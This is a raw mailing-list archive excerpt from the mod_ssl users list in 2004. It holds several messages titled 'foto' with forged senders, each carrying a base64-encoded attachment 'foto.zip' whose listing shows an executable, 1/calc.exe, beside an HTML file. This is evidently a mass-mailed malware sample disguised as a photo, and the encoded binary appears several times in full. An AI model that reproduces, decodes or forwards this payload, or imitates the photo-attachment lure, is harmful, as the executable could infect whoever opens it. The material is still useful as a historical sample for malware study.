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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------xsgtitytajskdfjvdwin--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 15:01:36 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C52B6A8A65; Wed,  1 Sep 2004 15:01:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ibm-tutawko3x6t.com (bi01p1.nc.us.ibm.com [129.33.49.251])
	by master.modssl.org (Postfix) with SMTP id 1A223A8982
	for ; Wed,  1 Sep 2004 15:01:32 +0200 (CEST)
Date: Wed, 01 Sep 2004 09:02:25 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------gvavzkjxkhaehztobesc"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------gvavzkjxkhaehztobesc
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------gvavzkjxkhaehztobesc
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------gvavzkjxkhaehztobesc--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 15:08:51 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7FE4FA8943; Wed,  1 Sep 2004 15:08:51 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from slara.com (adsl-68-20-213-142.dsl.chcgil.ameritech.net [68.20.213.142])
	by master.modssl.org (Postfix) with SMTP id 9FA6FA8934
	for ; Wed,  1 Sep 2004 15:08:45 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:08:36 -0600
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------xdlydiuesrhuxvebfwkh"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------xdlydiuesrhuxvebfwkh
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------xdlydiuesrhuxvebfwkh
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
